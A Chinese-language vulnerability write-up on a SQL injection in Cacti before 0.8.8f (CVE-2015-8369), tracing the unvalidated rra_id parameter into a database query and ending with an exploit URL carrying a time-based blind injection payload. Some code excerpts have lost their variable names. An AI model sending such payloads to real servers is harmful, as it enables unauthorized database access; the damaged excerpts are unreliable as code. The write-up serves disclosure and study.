cacti lib/rrd.php rrdtoll 1343,Cacti SQL注入漏洞（CNVD-2015-08486）

### 0x01 漏洞简述

Cacti是Cacti集团的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据，使用RRDtool绘画图形进行分析，并提供数据和用户管理功能。

Cacti 0.8.8f以前版本存在SQL注入漏洞。允许远程攻击者通过graphphp属性行动中的rra_id参数执行任意SQL命令。

### 0x02 漏洞细节

漏洞存在于文件

/cacti-0.8.8f/graph.php

line 25

```

include_once("./include/top_graph_header.php");

/* set default action */

if (!isset(["action"])) { ["action"] = "view"; }

if (!isset(["view_type"])) { ["view_type"] = ""; }

= true;

include("./include/auth.php");

include_once("./lib/rrd.php");

api_plugin_hook_function('graph');

include_once("./lib/html_tree.php");

include_once("./include/top_graph_header.php");

/* ================= input validation ================= */

input_validate_input_regex(get_request_var("rra_id"), "^([0-9]+|all)$");

input_validate_input_number(get_request_var("local_graph_id"));

input_validate_input_number(get_request_var("graph_end"));

input_validate_input_number(get_request_var("graph_start"));

input_validate_input_regex(get_request_var_request("view_type"), "^([a-zA-Z0-9]+)$");

/* ==================================================== */

```

/cacti-0.8.8f/include/top_graph_header.php

line 30 rra_id 参数未验证

```

/* ================= input validation ================= */

input_validate_input_number(get_request_var_request("local_graph_id"));

input_validate_input_number(get_request_var_request("graph_start"));

input_validate_input_number(get_request_var_request("graph_end"));

/* ==================================================== */

```

继续跟踪

line 158

$graph_data_array["print_source"] = true;

/* override: graph start time (unix time) */

if (!empty($_GET["graph_start"])) {

$graph_data_array["graph_start"] = get_request_var_request("graph_start");

}

/* override: graph end time (unix time) */

if (!empty($_GET["graph_end"])) {

$graph_data_array["graph_end"] = get_request_var_request("graph_end");

}

print trim(@rrdtool_function_graph(get_request_var_request("local_graph_id"), get_request_var_request("rra_id"), $graph_data_array));

?>

\cacti-0.8.8f\lib\rrd.php function rrdtool_function_graph line 631

$rra["timespan"] = 86400;

}else{

/* get a list of RRAs related to this graph */

$rras = get_associated_rras($local_graph_id);

if (sizeof($rras) > 0) {

foreach ($rras as $unchosen_rra) {

/* the timespan specified in the RRA "timespan" field may not be accurate */

$real_timespan = ($ds_step * $unchosen_rra["steps"] * $unchosen_rra["rows"]);

/* make sure the current start/end times fit within each RRA's timespan */

if ( (($graph_data_array["graph_end"] - $graph_data_array["graph_start"]) <= $real_timespan) && ((time() - $graph_data_array["graph_start"]) <= $real_timespan) ) {

/* is this RRA better than the already chosen one? */

if ((isset($rra)) && ($unchosen_rra["steps"] < $rra["steps"])) {

$rra = $unchosen_rra;

}else if (!isset($rra)) {

$rra = $unchosen_rra;

}

}

}

}

if (!isset($rra)) {

$rra["rows"] = 600;

$rra["steps"] = 1;

}

}

}else{

// sql injection here

$rra = db_fetch_row("select timespan,rows,steps from rra where id=$rra_id");

}

利用方式：

```

http://192.168.x.x/cacti/graph.php?action=properties&local_graph_id=1&rra_id=1%20and%20benchmark(20000000%2csha1(1))--%20&view_type=&graph_start=1448274676&graph_end=1448360776

```

### 0x03 参考链接

FULLDISC:20151209 [CVE-2015-8369] Cacti SQL injection in graph.php

URL:http://seclists.org/fulldisclosure/2015/Dec/8

MISC:http://bugs.cacti.net/view.php?id=2646